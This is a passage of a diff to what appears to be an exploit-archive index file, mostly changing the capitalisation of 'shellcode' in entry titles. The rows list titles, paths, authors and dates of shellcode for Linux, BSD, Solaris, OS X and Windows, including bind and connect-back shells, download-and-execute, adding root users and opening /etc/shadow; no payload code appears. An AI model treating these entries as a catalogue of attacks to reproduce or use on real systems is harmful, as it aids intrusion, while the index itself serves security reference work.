bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 -13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0 -13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - portbind port 6789 shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 -13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-bac shellcode k (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 -13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - portbinding shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0 -13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - portbind/TCP shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0 -13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 -13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0)_ execve(/bin/cat_ /etc/shadow)_ exit(0) shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 -13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 -13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - Add services and execve inetd shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 -13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0 +13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 +13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 +13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode (encoded by +1) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 +13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connect-back Shellcode 127.0.0.1:31337/TCP (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13397,platforms/lin_x86/shellcode/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) / PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Connect Back Shellcode (90 bytes)",2005-12-28,xort,lin_x86,shellcode,0 +13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - socket-proxy Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0 +13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13405,platforms/lin_x86/shellcode/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13406,platforms/lin_x86/shellcode/13406.c,"Linux/x86 - read(0_buf_2541); chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13407,platforms/lin_x86/shellcode/13407.c,"Linux/x86 - write(0__Hello core!\n__12); (with optional 7 byte exit) Shellcode (36 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - snoop /dev/dsp Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0 +13409,platforms/lin_x86/shellcode/13409.c,"Linux/x86 - /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode,0 +13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (.s) (187+ bytes)",2005-09-09,xort,lin_x86,shellcode,0 +13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (187+ bytes)",2005-09-08,xort,lin_x86,shellcode,0 +13412,platforms/lin_x86/shellcode/13412.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0 +13413,platforms/lin_x86/shellcode/13413.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode,0 +13414,platforms/lin_x86/shellcode/13414.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode,0 +13415,platforms/lin_x86/shellcode/13415.c,"Linux/x86 - chroot & standart Shellcode (66 bytes)",2005-07-11,Okti,lin_x86,shellcode,0 +13416,platforms/lin_x86/shellcode/13416.txt,"Linux/x86 - upload & exec Shellcode (189 bytes)",2005-06-19,cybertronic,lin_x86,shellcode,0 +13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid/execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0 +13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - alpha-numeric Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - alpha-numeric using IMUL Method Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0 +13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 +13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 +13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0 +13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 +13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - portbind port 5074 toupper Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 +13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add user 't00r' encrypt Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 +13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 +13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - shared memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 +13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - iptables -F Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0 +13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - iptables -F Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 +13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse telnet Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0 +13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - connect Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 +13437,platforms/lin_x86/shellcode/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 +13439,platforms/lin_x86/shellcode/13439.c,"Linux/x86 - eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 +13440,platforms/lin_x86/shellcode/13440.c,"Linux/x86 - xterm -ut -display [IP]:0 Shellcode (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 +13441,platforms/lin_x86/shellcode/13441.c,"Linux/x86 - ipchains -F Shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0 +13442,platforms/lin_x86/shellcode/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13443,platforms/lin_x86/shellcode/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13444,platforms/lin_x86/shellcode/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13445,platforms/lin_x86/shellcode/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13446,platforms/lin_x86/shellcode/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 +13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - portbind port 5074 Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - portbind port 5074 + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add user 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add user Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0 +13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 +13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 +13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0 +13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 +13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh tolower() evasion Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 +13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - execve of /bin/sh after setreuid(0_0) Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 +13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code Shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0 +13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh toupper() evasion Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0 +13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 +13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 +13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - bindshell port 4444 Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 +13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 +13465,platforms/multiple/shellcode/13465.c,"Linux PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 +13466,platforms/multiple/shellcode/13466.c,"OS-X PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 +13467,platforms/multiple/shellcode/13467.c,"Linux/x86 & Unix/SPARC & IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0 +13468,platforms/multiple/shellcode/13468.c,"Linux/x86 & Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0 +13469,platforms/multiple/shellcode/13469.c,"Linux/x86 & bsd/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0 +13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - kill all processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0 +13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - callback Shellcode (port 6666) (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0 +13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve(/bin/sh) ( Shellcode 23 bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0 +13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - portbind port 6969 Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0 +13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0 +13478,platforms/osx_ppc/shellcode/13478.c,"OS-X/PPC - sync()_ reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 +13479,platforms/osx_ppc/shellcode/13479.c,"OS-X/PPC - execve(/bin/sh)_ exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 +13480,platforms/osx_ppc/shellcode/13480.c,"OS-X/PPC - Add user _r00t_ Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13481,platforms/osx_ppc/shellcode/13481.c,"OS-X/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13482,platforms/osx_ppc/shellcode/13482.c,"OS-X/PPC - Add inetd backdoor Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13483,platforms/osx_ppc/shellcode/13483.c,"OS-X/PPC - reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13484,platforms/osx_ppc/shellcode/13484.c,"OS-X/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13485,platforms/osx_ppc/shellcode/13485.c,"OS-X/PPC - create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13486,platforms/osx_ppc/shellcode/13486.c,"OS-X/PPC - simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13487,platforms/osx_ppc/shellcode/13487.c,"OS-X/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 +13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - download and execute Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0 +13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 +13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes)",2006-07-21,xort,solaris_sparc,shellcode,0 +13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid/execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 +13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - portbind (port 6666) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 +13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0 +13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - portbind port 6789 Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 +13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-bac Shellcode k (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 +13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - portbinding Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0 +13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - portbind/TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0 +13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 +13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0)_ execve(/bin/cat_ /etc/shadow)_ exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 +13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 +13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - Add services and execve inetd Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 +13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0 13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode",2009-07-27,Skylined,win_x86,shellcode,0 -13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 +13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - Remote Denial of Service (APPE)",2012-03-17,"brock haun",windows,dos,0 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH omelet shellcode",2009-03-16,Skylined,win_x86,shellcode,0 -13508,platforms/win_x86/shellcode/13508.asm,"Win32 - telnetbind by Winexec 23 port shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0 -13509,platforms/win_x86/shellcode/13509.c,"Win32 - PEB!NtGlobalFlags shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0 -13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 FR - Sellcode cmd.exe shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 -13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0 -13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB Kernel32.dll ImageBase Finder Alphanumeric shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 -13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB Kernel32.dll ImageBase Finder (ASCII Printable) shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 +13508,platforms/win_x86/shellcode/13508.asm,"Win32 - telnetbind by Winexec 23 port Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,win_x86,shellcode,0 +13509,platforms/win_x86/shellcode/13509.c,"Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,win_x86,shellcode,0 +13510,platforms/win_x86/shellcode/13510.c,"Win32 XP SP2 FR - Sellcode cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,win_x86,shellcode,0 +13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0 +13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB Kernel32.dll ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 +13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB Kernel32.dll ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback_ receive_ save and execute shellcode",2008-08-25,loco,win_x86,shellcode,0 13515,platforms/win_x86/shellcode/13515.pl,"Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)",2008-03-14,"YAG KOHHA",win_x86,shellcode,0 13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Tiny Download and Exec Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0 -13517,platforms/win_x86/shellcode/13517.asm,"Win32 - download and execute shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0 -13518,platforms/win_x86/shellcode/13518.c,"Win32/NT/XP - IsDebuggerPresent ShellCode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode,0 +13517,platforms/win_x86/shellcode/13517.asm,"Win32 - download and execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0 +13518,platforms/win_x86/shellcode/13518.c,"Win32/NT/XP - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,win_x86,shellcode,0 13519,platforms/win_x86/shellcode/13519.c,"Win32 SP1/SP2 - Beep Shellcode (35 bytes)",2006-04-14,xnull,win_x86,shellcode,0 -13520,platforms/win_x86/shellcode/13520.c,"Win32/XP SP2 - Pop up message box shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode,0 -13521,platforms/win_x86/shellcode/13521.asm,"Win32 - WinExec() Command Parameter shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0 +13520,platforms/win_x86/shellcode/13520.c,"Win32/XP SP2 - Pop up message box Shellcode (110 bytes)",2006-01-24,Omega7,win_x86,shellcode,0 +13521,platforms/win_x86/shellcode/13521.asm,"Win32 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0 13522,platforms/win_x86/shellcode/13522.c,"Win32 - Download & Exec Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0 13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0 13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic Shellcode without Loader (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0 -13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0 -13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0 -13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0 -13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Connect Back shellcode for Overflow (275 bytes)",2004-10-25,lion,win_x86,shellcode,0 -13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File and Exec shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0 +13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0 +13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0 +13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0 +13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)",2004-10-25,lion,win_x86,shellcode,0 +13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File and Exec Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0 13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - download and exec source shellcode",2004-09-26,"Peter 